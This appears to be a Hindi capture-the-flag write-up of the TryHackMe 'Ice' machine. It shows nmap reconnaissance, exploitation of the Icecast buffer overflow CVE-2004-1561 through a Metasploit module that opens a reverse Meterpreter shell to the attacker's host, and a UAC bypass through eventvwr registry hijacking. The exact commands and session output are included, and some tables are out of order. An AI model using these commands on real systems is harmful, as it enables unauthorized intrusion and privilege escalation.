
TryHackMe के Ice मशीन का पूर्ण समझौता — बफर ओवरफ्लो के माध्यम से Icecast 2.0.1 RCE (CVE-2004-1561), उसके बाद UAC बाईपास / COM अपहरण के माध्यम से Windows विशेषाधिकार वृद्धि। विस्तृत पद्धति और उपचार शामिल है।
प्लेटफ़ॉर्म: TryHackMe लक्ष्य OS: Windows 7 / Windows Server 2008 R2 कठिनाई: आसान श्रेणी: बफ़र ओवरफ़्लो (RCE), स्थानीय विशेषाधिकार वृद्धि
यह रिपोर्ट TryHackMe पर Ice मशीन के पूर्ण समझौते का दस्तावेज़ीकरण करती है, प्रारंभिक टोही से लेकर SYSTEM-स्तरीय विशेषाधिकार वृद्धि तक। लक्ष्य एक पुराने Icecast 2.0.1 स्ट्रीमिंग मीडिया सर्वर को उजागर करता है जो एक रिमोट बफ़र ओवरफ़्लो (CVE-2004-1561) के लिए असुरक्षित है जो क्राफ्टेड HTTP हेडर के माध्यम से मनमाना कोड निष्पादन की अनुमति देता है। प्रारंभिक पहुँच एक Meterpreter रिवर्स शेल के माध्यम से निम्न-विशेषाधिकार वाले उपयोगकर्ता के रूप में प्राप्त की गई थी। फिर NT AUTHORITY\SYSTEM में विशेषाधिकार वृद्धि एक Windows COM ऑब्जेक्ट हाइजैक भेद्यता (bypassuac_eventvwr) का दुरुपयोग करके प्राप्त की गई जो HKCU के अंतर्गत स्वचालित-एलिवेटिंग बाइनरी और रजिस्ट्री कुंजी रीडायरेक्शन का लाभ उठाती है।
| चरण | तकनीक | परिणाम |
|---|---|---|
| टोही | arp-scan, nmap | होस्ट + 7 खुले पोर्ट पहचाने गए |
| प्रारंभिक पहुँच | Icecast HTTP हेडर बफ़र ओवरफ़्लो (CVE-2004-1561) | स्थानीय उपयोगकर्ता के रूप में Meterpreter सत्र |
| विशेषाधिकार वृद्धि | bypassuac_eventvwr (COM/रजिस्ट्री अपहरण) | SYSTEM शेल |
स्थानीय नेटवर्क पर लक्ष्य का IP पता पहचानने के लिए ARP स्कैन का उपयोग किया गया।
arp-scan -l

लक्ष्य 192.168.37.138 पर पहचाना गया।
लक्ष्य के विरुद्ध सेवा/संस्करण पहचान के साथ पूर्ण SYN स्कैन चलाया गया:
nmap -sS -sV 192.168.37.138
परिणाम:
होस्ट DARK-PC के रूप में फ़िंगरप्रिंट किया गया, एक Windows मशीन। पोर्ट 8000 पर चल रहा Icecast सबसे आशाजनक आक्रमण सतह के रूप में सामने आया — यह एक मानक Windows सेवा नहीं है और ऐतिहासिक CVE ले जाने के लिए जाना जाता है।
ज्ञात Icecast भेद्यताओं की खोज ने CVE-2004-1561 को सतह पर लाया:
Icecast 2.0.1 और पूर्व संस्करणों में बफ़र ओवरफ़्लो रिमोट हमलावरों को बड़ी संख्या में हेडर वाले HTTP अनुरोध के माध्यम से मनमाना कोड निष्पादित करने की अनुमति देता है।
एक मिलता-जुलता Metasploit मॉड्यूल पुष्टि किया गया:
search CVE-2004-1561

exploit/windows/http/icecast_header 2004-09-28 great No Icecast Header Overwrite
Icecast 2.0.1 HTTP हेडर की संख्या को उचित रूप से बाउंड-चेक करने में विफल रहता है। सर्वर के बफ़र की क्षमता से अधिक हेडर भेजकर, अतिरिक्त डेटा आसन्न मेमोरी में ओवरफ़्लो हो जाता है, आरक्षित हेडर-पार्सिंग बफ़र के बाहर डेटा को अधिलेखित कर देता है।
विशेष रूप से, ओवरफ़्लो स्टैक पर सहेजे गए वापसी पते (EIP) को दूषित करता है — वह पता जिस पर CPU अनुरोध को संभालने वाले फ़ंक्शन के वापस आने पर कूदता है। इस पते को नियंत्रित करके, एक हमलावर वैध वापसी बिंदु के बजाय निष्पादन को हमलावर-प्रदत्त शेलकोड की ओर पुनर्निर्देशित कर सकता है, जिसके परिणामस्वरूप Icecast प्रक्रिया के संदर्भ में मनमाना कोड निष्पादन होता है।
use exploit/windows/http/icecast_header
set RHOSTS 192.168.37.138
set RPORT 8000
set LHOST 192.168.37.133
set LPORT 4444

exploit
[*] Started reverse TCP handler on 192.168.37.133:4444
[*] Sending stage (177734 bytes) to 192.168.37.138
[*] Meterpreter session 1 opened (192.168.37.133:4444 -> 192.168.37.138:49181)
एक निम्न-विशेषाधिकार वाले उपयोगकर्ता के रूप में एक Meterpreter सत्र स्थापित किया गया।
सक्रिय सत्र के साथ, लक्ष्य के पैच स्तर के लिए व्यवहार्य स्थानीय विशेषाधिकार वृद्धि पथों की पहचान करने के लिए Metasploit के अंतर्निहित सुझावक का उपयोग किया गया:
use post/multi/recon/local_exploit_suggester
set SESSION 1
run

कई मॉड्यूल को संभावित रूप से व्यवहार्य के रूप में चिह्नित किया गया, जिसमें bypassuac_eventvwr शामिल है, जो अनपैच किए गए Windows 7 / Server 2008 R2 होस्ट को लक्षित करता है।
यह विशेषाधिकार वृद्धि पथ Windows की COM (Component Object Model) आर्किटेक्चर का दुरुपयोग करता है, जो विभिन्न भाषाओं में लिखे गए घटकों को इंटरऑपरेट करने की अनुमति देता है। COM ऑब्जेक्ट आमतौर पर साझा DLL पर निर्भर करते हैं, और सिस्टम किसी दिए गए COM ऑब्जेक्ट के लिए कौन सी DLL लोड करना है, यह रजिस्ट्री पथों के माध्यम से हल करता है — जिसमें वर्तमान उपयोगकर्ता के HKCU हाइव के अंतर्गत संग्रहीत पथ शामिल हैं।
eventvwr.exe एक स्वचालित-एलिवेटिंग Windows बाइनरी है (यह चुपचाप UAC एलिवेशन प्रॉम्प्ट को ट्रिगर करता है बिना प्रॉम्प्ट दिखाए, इसके मेनिफ़ेस्ट सेटिंग्स के कारण, डिफ़ॉल्ट UAC कॉन्फ़िगरेशन पर)। जब यह चलता है, तो यह एक COM ऑब्जेक्ट को हल करने और उससे संबद्ध DLL लोड करने के लिए HKCU से क्वेरी करता है।
शोषण इस लुकअप को हाइजैक करता है: यह वर्तमान उपयोगकर्ता के HKCU हाइव के अंतर्गत एक दुर्भावनापूर्ण रजिस्ट्री कुंजी लिखता है, जो वैध सिस्टम DLL के बजाय COM रिज़ॉल्यूशन को हमलावर-नियंत्रित पेलोड की ओर इंगित करता है। क्योंकि eventvwr.exe स्वचालित रूप से एलिवेट होता है, यह जो पेलोड ट्रिगर करता है — इस मामले में एक कमांड शेल — उस अखंडता स्तर के साथ निष्पादित होता है जिस पर eventvwr.exe एलिवेट होता है, सत्र को एक मानक उपयोगकर्ता से उच्च-विशेषाधिकार वाले संदर्भ में बढ़ाता है, बिना कभी दृश्य UAC प्रॉम्प्ट प्रस्तुत किए।
use exploit/windows/local/bypassuac_eventvwr
set SESSION 1
set LHOST 192.168.37.133
set LPORT 4444
exploit

[*] UAC is enabled, checking level...
[+] Part of Administrators group! Continuing...
[*] BypassUAC can bypass this setting, continuing...
[*] Configuring payload and stager registry keys ...
[*] Executing payload: C:\Windows\SysWOW64\eventvwr.exe
[*] Meterpreter session 2 opened (192.168.37.133:4444 -> 192.168.37.138:49180)
[*] Cleaning up registry keys ...
C:\Windows\system32>
एक दूसरा Meterpreter सत्र एक एलिवेटेड शेल के साथ खोला गया, जो सीधे C:\Windows\system32 में गिरा, विशेषाधिकार वृद्धि की पुष्टि करता है।
| # | निष्कर्ष | गंभीरता | CVE / संदर्भ |
|---|
eventvwr.exe स्वचालित-एलिवेशन दुरुपयोग को बाद के Windows बिल्ड में पैच किया गया था; यह हमला पूरी तरह से अपडेटेड, आधुनिक Windows संस्करणों के विरुद्ध काम नहीं करता है।arp-scan, nmap — टोहीMetasploit Framework (msfconsole) — शोषण और पोस्ट-शोषणMeterpreter — पोस्ट-शोषण शेल| पोर्ट | सेवा | संस्करण |
|---|
| 135/tcp | msrpc | Microsoft Windows RPC |
| 139/tcp | netbios-ssn | Microsoft Windows netbios-ssn |
| 445/tcp | microsoft-ds | Windows 7–10 (कार्यसमूह: WORKGROUP) |
| 5357/tcp | http | Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP) |
| 8000/tcp | http | Icecast स्ट्रीमिंग मीडिया सर्वर |
| 49152–49157/tcp | msrpc | Microsoft Windows RPC |
| 1 | Icecast 2.0.1 HTTP हेडर बफ़र ओवरफ़्लो जो रिमोट कोड निष्पादन की ओर ले जाता है | गंभीर | CVE-2004-1561 |
| 2 | COM/रजिस्ट्री अपहरण के माध्यम से UAC बाईपास (eventvwr.exe स्वचालित-एलिवेशन) | उच्च | ज्ञात Windows 7/Server 2008 R2 UAC डिज़ाइन कमज़ोरी |